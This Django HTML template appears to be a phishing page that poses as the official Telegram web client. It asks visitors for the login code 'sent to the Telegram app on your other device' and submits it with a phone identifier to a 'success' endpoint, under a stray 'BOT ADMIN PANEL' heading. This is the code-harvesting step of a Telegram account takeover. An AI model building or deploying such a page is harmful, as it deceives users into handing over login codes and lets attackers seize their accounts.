{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="{% static 'style.css' %}">
</head>
<body>
    <form action="{% url 'success'  phone.id %}" method="POST" class="form_code">
        {% csrf_token %}
        <div class="navbar">
            <div class="navbar-brand ">
                <img src="" alt="">
            </div>
            <div class="title"></div>
            <button >Next <span></span></button>
        </div>
        <div class="container2">
            <div class="content2">
                <p class="number">BOT ADMIN PANEL </p>
                <!-- <a class="edit" href="">Edit phone number</a> -->
                <p class="p11" style="text-align: center;">We've sent the code to the Telegram app on your other device. <br>Please enter the code below.</p>
                <input type="text" class="code" name="code" placeholder="Enter your code">

            </div> 
        </div>
    </form> 
    <p class="footer">Welcome to the official Telegram web-client.</p>
    <script src="{% static 'script.js' %}"></script>
    <script src="https://kit.fontawesome.com/92d93db707.js" crossorigin="anonymous"></script></body>
</html>